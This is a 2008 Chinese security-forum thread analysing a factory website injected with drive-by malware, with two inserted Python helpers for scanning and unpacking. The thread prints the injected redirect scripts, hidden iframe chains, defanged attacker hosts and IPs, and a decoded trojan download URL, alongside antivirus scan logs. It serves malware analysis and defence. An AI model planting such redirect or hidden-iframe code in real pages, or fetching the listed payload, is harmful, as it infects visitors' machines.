[Verified] Zhongbang Lenticular Material Factory (众邦立体光栅材料厂) website injected with malicious code (挂马)

九尾野狐 (avatar blocked)
Posted 2008-5-17 14:57:08
The Zhongbang Lenticular Material Factory site (hxxp://www.xtsptg.com) has had malicious code inserted:
    [script]hxxp://cnzz.zyns.com/stat.js?id=4265203&web_id=4265203&show=pic
    [frame]hxxp://ca.winvv.com/cn.htm

-----

The first one, saved as hXXp___cnzz.zyns.com_stat.js_id=4265203&web_id=4265203&show=pic.js, contains the following:
<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script Language="javascript">
var strArray = "hXXp://220.165.9.233:2080/response.asp?MT=";
t = strArray + window.location.hostname.replace(/\./g," ");
document.location.href = t;
</script>
</head>
<body>
</body>
</html>

-----

hXXp://220.165.9.233:2080/response.asp?MT contains the following:
<html>
<head>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
<script language="Javascript">
    rnd.today=new Date();
    rnd.seed=rnd.today.getTime();
    function rnd() {
       rnd.seed = (rnd.seed*9301+49297) % 233280;
       return rnd.seed/(233280.0);
    };
    function rand(number) {
       return Math.ceil(rnd()*number);
    };

function jump(){

strArray = "hXXp://www.wipa68.com/cuolian.htm?id=310006&url=";
try{
      var $url = window.location.href;
      } catch(e){
          var $url = window.top.location.href;
      }

   var $start = $url.indexOf('MT=')+3;
   if ($start > 3) {
       var $Query_String = $url.substring($start, $url.length);
       var $Get_List = $Query_String.split('&');
       t = strArray + $Get_List[0]+"&id="+rnd()*100000000000000000000;
   }
   else {
       t = strArray + window.location.hostname+"&id="+rnd()*100000000000000000000;
   }
   document.location.href = t;
}
</script>
</head>
<body>
<script language="Javascript">
   var counterURL="hXXp://220.165.9.235:2080/nxdomain233.css"
   counterURL=counterURL+"."+rnd()*100000000000000000000;
   document.write("<iframe width=0 height=0 frameborder=0 scrolling=auto src="+counterURL+"></iframe>");

   setTimeout("jump()",100);

</script>
</body>
</html>


-----

The second one, hxxp://ca.winvv.com/cn.htm, contains the following:

<iframe src=hXXp://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src=hXXp://www.fast800.cn/shan.htm width=0 height=0></iframe>
<iframe src="hXXp://ca.winvv.com/ie.htm" width=0 height=0></iframe>
<iframe src="hXXp://czz.aeaer.com/c.htm" width=0 height=0></iframe>

-----

Of these, hXXp://jjj.hfb86.cn/w6.htm contains the following:
<html>
<head>
<script language="JavaScript" defer>
   // [packed eval(function(p,a,c,k,e,d){...}) payload omitted here: several thousand characters of obfuscated script data]

   </script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
   Unable to create object
</object>
</body>
</html>

<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/cc.htm" width=100 height=1></iframe>
<iframe src="hXXp://yuerhj905687hjerklgf.cn/new/c1.htm" width=1 height=1></iframe>

<script language="javascript" src="hXXp://ww4.tongji123.com/t1.aspx?id=44206085"></script>

<script src='http://s90.cnzz.com/stat.php?id=880299&web_id=880299' language='JavaScript' charset='gb2312'></script>

<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1876325.js"></script>

-----

hXXp://www.fast800.cn/shan.htm contains the following:
<html>
<body>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe width=50 height=0 src=ad/vip.htm></iframe>");}</SCRIPT>
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1660620.js"></script>
</body>
</html>
-----

hXXp://ca.winvv.com/ie.htm contains the following:
<iframe src="hXXp://www.kekg888.cn/web/6619038.htm" width=100 height=0></iframe>
<iframe src=hXXp://www.usaicac.cn/5519.htm width=100 height=0></iframe>


-----

hXXp://czz.aeaer.com/c.htm contains the following:
<iframe src=hXXp://cc.benchi999.com/one/huai5.htm width=2 height=2></iframe>

-----

[ This post was last edited by 没注册 on 2008-5-17 14:59 ]
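As an added defender-side check (not code from the thread), here is a scanner that walks an HTML page and flags the three injection indicators visible in the samples above: iframes sized 0 to 2 px or sourced from another host, <script src> includes from another host, and inline scripts carrying the eval(function(p,a,c,k,e,d) packer or document.write("<iframe markers. SAMPLE_HTML, its .test hosts and the page host www.victim.test are constructed placeholders.

```python
"""Flag drive-by injection indicators in HTML: tiny or off-site iframes, off-site <script src>
includes, and inline scripts carrying packer/obfuscation markers. Added example; SAMPLE_HTML is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_HIDDEN_PX = 2  # the thread's samples used 0x0, 100x0, 1x1 and 2x2 iframes
PACKER_SIGNATURES = ("eval(function(p,a,c,k,e,d)", "String.fromCharCode", 'document.write("<iframe')

class InjectionScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host  # hostname the page legitimately belongs to
        self.findings = []          # (indicator, detail) tuples, in document order
        self._in_script = False

    def _offsite(self, url):
        host = urlparse(url).hostname
        return bool(host) and host != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            dims = (a.get("width", ""), a.get("height", ""))
            tiny = any(d.isdigit() and int(d) <= MAX_HIDDEN_PX for d in dims)
            if tiny or self._offsite(a.get("src", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            if self._offsite(a.get("src", "")):
                self.findings.append(("offsite-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):  # <script> bodies arrive here as CDATA
        if self._in_script:
            self.findings.extend(("packed-script", s) for s in PACKER_SIGNATURES if s in data)

def scan_html(html, page_host):
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    return scanner.findings

# Constructed sample shaped like cn.htm plus the injected tracker/packed scripts; hosts are placeholders.
SAMPLE_HTML = """<html><body>
<iframe src=http://jjj.bad.test/w6.htm width=100 height=0></iframe>
<iframe src="http://ca.bad.test/ie.htm" width=0 height=0></iframe>
<script language="javascript" src="http://stats.bad.test/t1.aspx?id=1"></script>
<script>eval(function(p,a,c,k,e,d){return p}('0(1)',10,2,'a|b'.split('|')))</script>
</body></html>"""
```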
jiffy
Posted 2008-5-17 15:02:33
The first one won't open.

The second one:
(screenshot attachment: 未命名.JPG)
jiffy
Posted 2008-5-17 15:03:24
Looks like I'm the only one here scanning with Norton!
Exia (this user has been deleted)
Posted 2008-5-17 15:08:00
Starting the file scan:

Begin scan in 'E:\AV\c.htm'
Begin scan in 'E:\AV\ie.htm'
E:\AV\ie.htm
      [DETECTION] Contains suspicious code HEUR/HTML.Malware
      [NOTE]      The fund was classified as suspicious.
      [NOTE]      The file was moved to '485c8534.qua'!
Begin scan in 'E:\AV\shan.htm'
Begin scan in 'E:\AV\cn.htm'
E:\AV\cn.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
      [NOTE]      The file was deleted!
Begin scan in 'E:\AV\w6.htm'
E:\AV\w6.htm
      [DETECTION] Contains suspicious code HEUR/HTML.Malware
      [NOTE]      The fund was classified as suspicious.
      [NOTE]      The file was moved to '485c8505.qua'!
Begin scan in 'E:\AV\cc.htm'
Begin scan in 'E:\AV\c1.htm'
Begin scan in 'E:\AV\huai5.htm'


End of the scan: 2008年5月17日  15:10
Used time: 00:11 min

The scan has been done completely.

      0 Scanning directories
      8 Files were scanned
      1 viruses and/or unwanted programs were found
      2 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      2 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      7 Files not concerned
      0 Archives were scanned
      0 Warnings
      3 Notes
granthill
Posted 2008-5-17 15:32:52

Reply to post #1 by 没注册

After decoding that eval(function(p,a,c,k,e,d):

http://b.s102-cnzz.com/0rl.exe
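An added example (not granthill's or the thread's code) of how that decoding is done offline without evaluating the script: the same substitution loop the packer stub performs, applied to p and k pulled from the eval(...) call, followed by decoding of the String.fromCharCode(...) layer the sample hides its string constants behind. PACKED_SAMPLE, its char-code table and the URL x.test/a.exe are constructed placeholders, not the thread's payload.

```python
"""Reverse the two-layer obfuscation seen in w6.htm without running it: first the
eval(function(p,a,c,k,e,d){...}) packer (this variant uses plain decimal tokens), then the
String.fromCharCode(...) layer beneath it. Added example; PACKED_SAMPLE is constructed."""
import json
import re

# Tail of the packer call: '<p>',<a>,<c>,'<k>'.split('|'))). Assumes p and k contain no
# unescaped single quote, which holds for the sample in the thread.
PACKER_CALL = re.compile(r"\}\('(?P<p>.*?)',(\d+),(\d+),'(?P<k>.*?)'\.split\('\|'\)\)\)", re.S)
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

def unpack_decimal_packer(p, k):
    """Same loop as the packer's own stub: for c counting down, replace each whole-word
    decimal token c with k[c] when k[c] is non-empty."""
    for c in range(len(k) - 1, -1, -1):
        if k[c]:
            p = re.sub(r"\b%d\b" % c, lambda m, rep=k[c]: rep, p)
    return p

def unpack_script(packed):
    """Pull p and k out of a packed eval(...) call and return the source it would have eval'd."""
    m = PACKER_CALL.search(packed)
    if not m:
        raise ValueError("no p,a,c,k,e,d call found")
    return unpack_decimal_packer(m.group("p"), m.group("k").split("|"))

def decode_fromcharcode(js):
    """Replace every String.fromCharCode(n,n,...) with an equivalent JS string literal."""
    def build(m):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return json.dumps("".join(map(chr, codes)))
    return FROMCHARCODE.sub(build, js)

def extract_urls(js):
    """Collect http(s) URLs from decoded source; this is the step that surfaces the download URL."""
    return re.findall(r"https?://[^\s'\"<>)]+", js)

# Constructed sample mirroring the thread's layout: k holds char codes, and unpacking yields
# eval(String.fromCharCode(...)). The URL is a placeholder, not the one reported in the thread.
PACKED_SAMPLE = (
    "eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+c+'\\\\b','g'),k[c])}}"
    "return p}('0(1.2(3,4,4,5,6,7,7,8,9,4,10,11,4,7,12,9,10,8,10))',10,13,"
    "'eval|String|fromCharCode|104|116|112|58|47|120|46|101|115|97'.split('|')))"
)
```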
wangjay1980
Posted 2008-5-17 16:19:09
K
(screenshot attachment: 屏幕截图00457.png)
tanlimo
Posted 2008-5-17 17:01:34
Pretty much the same as what some site got hit with yesterday.
雨宫优子
Posted 2008-5-17 17:07:15
2008-5-17 17:06:47        HTTP 过滤器        文件        http://b.s102-cnzz.com/0rl.exe        可能是 Win32/Genetik 特洛伊木马 的变种        连接中断 - 已隔离        Computer\***        通过应用程序访问 web 时检测到威胁: D:\Maxthon\Maxthon.exe.
Palkia
Posted 2008-5-17 18:40:02
Trojan.Agent.ltt.unvq
lx1234
Posted 2008-5-17 18:57:48
Guangxi Telecom "Online Anti-Virus Wall" friendly reminder:
Visiting this website may harm your computer!

    * Go back
    * Temporarily allow access to this site
    * Permanently allow access to this site
    * Close window

Thanks to Rising and Trend Micro for providing part of the technical support
Copyright © KaFan  KaFan.cn All Rights Reserved.
